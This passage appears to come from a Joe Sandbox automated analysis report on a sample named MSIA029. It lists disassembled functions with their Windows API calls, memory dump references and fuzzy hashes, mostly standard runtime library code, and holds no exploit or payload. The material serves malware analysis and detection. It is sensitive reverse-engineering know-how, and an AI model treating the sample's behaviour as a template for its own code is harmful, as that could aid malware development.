                                                                                                                                                                                                                                                    • Part of subcall function 00F346F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00F33778,-00000010,?,?,?,00F74215,000000FF), ref: 00F34736
                                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00F337C6
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00F74215,000000FF), ref: 00F337DB
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                                                                                                                                                                                                  • String ID: ntdll.dll
                                                                                                                                                                                                                                                  • API String ID: 3941625479-2227199552
                                                                                                                                                                                                                                                  • Opcode ID: 3d341bed1b964988c994765e8952865144c6324cbcaee33922fb90da5e4b98d5
                                                                                                                                                                                                                                                  • Instruction ID: 88804ee1e7be00e963dd4460ea831ac3f1d634a8ad3a38ce8e2f8c3c8888da97
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d341bed1b964988c994765e8952865144c6324cbcaee33922fb90da5e4b98d5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96419571A006099FDB10EF68DC45BEEB7A4FF14720F144529E916D72C1E7B4AA04DB51
                                                                                                                                                                                                                                                  Function 00F3621F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F31A20: LocalFree.KERNEL32(?), ref: 00F31A42
                                                                                                                                                                                                                                                    • Part of subcall function 00F53E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00F31434,?,?,00F3D341,00F31434,00F88B5C,?,00F31434,?,00000000), ref: 00F53EBA
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(80A20388,80A20388,?,?,00000000,00F74981,000000FF), ref: 00F362EB
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C98: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52CA3
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C98: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52CE0
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00F362B0
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00F362B7
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C4E: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C4E: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C4E: RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                                                                                                                                                                                                                  • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                                                  • API String ID: 1333104975-3789238822
                                                                                                                                                                                                                                                  • Opcode ID: b656b04648db29ae68777f4302e8c8fd212d75d3ce72deccc5004f9584f028a1
                                                                                                                                                                                                                                                  • Instruction ID: d17b84973946d42c8aa8e19ca6e4c7d6551bf30292427b58d522f10a169670e5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b656b04648db29ae68777f4302e8c8fd212d75d3ce72deccc5004f9584f028a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65219371D54709EFCB10EFA4DD06BADB7A8FB15B21F100225E915932D0E778A504AB62
                                                                                                                                                                                                                                                  Function 00F48451 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                                                                                                                                  • String ID: $+xv
                                                                                                                                                                                                                                                  • API String ID: 2204710431-1686923651
                                                                                                                                                                                                                                                  • Opcode ID: 1b3bd739266ef2adc04035d6528d1004d090bf7c8700521c65ffe8229c1515ae
                                                                                                                                                                                                                                                  • Instruction ID: 3290cb98755b43613af414f042c2e8a98c18bd00a98f134edb16e268f3ff8b28
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b3bd739266ef2adc04035d6528d1004d090bf7c8700521c65ffe8229c1515ae
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7421C4B1904B926ED725DF74C89073FBEF8AB08351F04455AE859C7A42D778E602DBA0
                                                                                                                                                                                                                                                  Function 00F36250 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(80A20388,80A20388,?,?,00000000,00F74981,000000FF), ref: 00F362EB
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C98: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52CA3
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C98: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52CE0
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00F362B0
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00F362B7
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C4E: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C4E: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C4E: RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                                                                                                                                                                                                  • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                                                  • API String ID: 2056477612-3789238822
                                                                                                                                                                                                                                                  • Opcode ID: d59fecf39f74d43deeaeecab41b0ece38b3472c74efd63538da57bd9ad9de472
                                                                                                                                                                                                                                                  • Instruction ID: 1b1787aaf452b2307a2f57c571d2b20cc170d354b3dd6df6c2a75698ff063cbd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d59fecf39f74d43deeaeecab41b0ece38b3472c74efd63538da57bd9ad9de472
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C911A272D14718EFCB10DF54DD05BA9B7A8FB15B20F00426AE815D37D0E775A904EB52
                                                                                                                                                                                                                                                  Function 00F569E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00F56AA3,?,?,00F8DDCC,00000000,?,00F56BCE,00000004,InitializeCriticalSectionEx,00F797E8,InitializeCriticalSectionEx,00000000), ref: 00F56A72
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                                                  • Opcode ID: d0d6caeff6e16acc5ab1a15b50a192966e303bc7e787732771cd34b0e973e288
                                                                                                                                                                                                                                                  • Instruction ID: 38a17c46b580d8ca98af7bb1a17fa9adba1b8bfb4b68b557d4800c6f458bf433
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0d6caeff6e16acc5ab1a15b50a192966e303bc7e787732771cd34b0e973e288
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4111CA32E04325ABCF229B689C41B5937949F12772F544260FF25FB280D774ED04A7D5
                                                                                                                                                                                                                                                  Function 00F62DEE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,80A20388,?,?,00000000,00F76A6C,000000FF,?,00F62DC1,?,?,00F62D95,?), ref: 00F62E23
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F62E35
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00F76A6C,000000FF,?,00F62DC1,?,?,00F62D95,?), ref: 00F62E57
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                  • Opcode ID: 454b832fc01998dbc6951577892e906b7c72299461d1aee50b50c0c9dd7f27d2
                                                                                                                                                                                                                                                  • Instruction ID: edac9e5e328ca27129b5fdbc1a8a50206f4b39610ee3beb33e1abb3ddee3e10d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 454b832fc01998dbc6951577892e906b7c72299461d1aee50b50c0c9dd7f27d2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E01A731918B1DABDB129F40CC05FAFBBB9FB44B10F004525F815E22A0DB759900DB92
                                                                                                                                                                                                                                                  Function 00F66DB9 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00F66E40
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00F66F01
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00F66F68
                                                                                                                                                                                                                                                    • Part of subcall function 00F65BDC: HeapAlloc.KERNEL32(00000000,00000000,00F63841,?,00F6543A,?,00000000,?,00F56CE7,00000000,00F63841,00000000,?,?,?,00F6363B), ref: 00F65C0E
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00F66F7D
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00F66F8D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1096550386-0
                                                                                                                                                                                                                                                  • Opcode ID: 93de434a40671367c6f55b63474d5d31fd7b4c53008ab27f29ae3e84b2ce87b3
                                                                                                                                                                                                                                                  • Instruction ID: 6ed37c7ced05e5905b8249c41975afb8382cabbd23c370953588933b52e2bc37
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93de434a40671367c6f55b63474d5d31fd7b4c53008ab27f29ae3e84b2ce87b3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09519072A00206AFEB219FA5DC81EBF7AA9EF54764B150229FD04D7151F735DC10B760
                                                                                                                                                                                                                                                  Function 00F3B8B0 Relevance: 7.6, APIs: 5, Instructions: 105COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B8DD
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B900
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B928
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F3B98D
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B9B7
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 459529453-0
                                                                                                                                                                                                                                                  • Opcode ID: 6cd991276e04835ba34c916d6f36d0fed1b91c6402fc7b35d6d68beaa2aa5c0d
                                                                                                                                                                                                                                                  • Instruction ID: 5bad69d9f45332281d22f02824acfe03005411300adbb709c65469567f28a10e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cd991276e04835ba34c916d6f36d0fed1b91c6402fc7b35d6d68beaa2aa5c0d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A310631D01218DFCB11CF54D990BAEBBB4EF24334F144159EA046B3A1DB35AE01EB91
                                                                                                                                                                                                                                                  Function 00F35890 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,?,76B14450,00F35646,?,?,?,?,?), ref: 00F35898
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                                                                                                                                                                                                  • API String ID: 1452528299-1782174991
                                                                                                                                                                                                                                                  • Opcode ID: a7ad338a37c776e7e59367e4a35f215c0bdd3bb9c1ccb662b5f0057e1da73ca4
                                                                                                                                                                                                                                                  • Instruction ID: ea442c78fff1aa600f8cc873ffe924270823cd926eea2f8a56c2540954e95bde
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7ad338a37c776e7e59367e4a35f215c0bdd3bb9c1ccb662b5f0057e1da73ca4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C118E56E1162587CB302F6CD8003A6B2E4DF90B74F65047FE889D7392EAB98C81A394
                                                                                                                                                                                                                                                  Function 00F41C42 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Maklocstr$Maklocchr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2020259771-0
                                                                                                                                                                                                                                                  • Opcode ID: e822b428384f5cf927c2b830cf53579db6d2aa42234418f3855afb998f49694f
                                                                                                                                                                                                                                                  • Instruction ID: a3645a512ece124c0e37acec273f08a27b5aa4fab1b05b4d7716dbab55ea7889
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e822b428384f5cf927c2b830cf53579db6d2aa42234418f3855afb998f49694f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 951191B1940784BFE720DBA4CC81F52BBECBF04750F040519FA55CBA41D268FC9497A9
                                                                                                                                                                                                                                                  Function 00F3D87C Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F3D883
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D88D
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • numpunct.LIBCPMT ref: 00F3D8C7
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F3D8DE
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D8FE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 743221004-0
                                                                                                                                                                                                                                                  • Opcode ID: dccd47c2c63d05e4372774c8000d2e186f6a27ec63241096fc0d7e9754282f9b
                                                                                                                                                                                                                                                  • Instruction ID: 9ffb3cb021d0df5b9ccf580af35667caed58ab6dcf9af08df59a121a9dea94c7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dccd47c2c63d05e4372774c8000d2e186f6a27ec63241096fc0d7e9754282f9b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE11CE35D0061ADFCB09FB64AC416BE7B60AF84730F240459F911AB2D1CF78AE05AB91
                                                                                                                                                                                                                                                  Function 00F422FA Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42301
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4230B
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • codecvt.LIBCPMT ref: 00F42345
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4235C
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4237C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 712880209-0
                                                                                                                                                                                                                                                  • Opcode ID: a27a86e3a5144d13edc9973fa1a62885075704da6d2b1f8ad42b43c3f96a4bb3
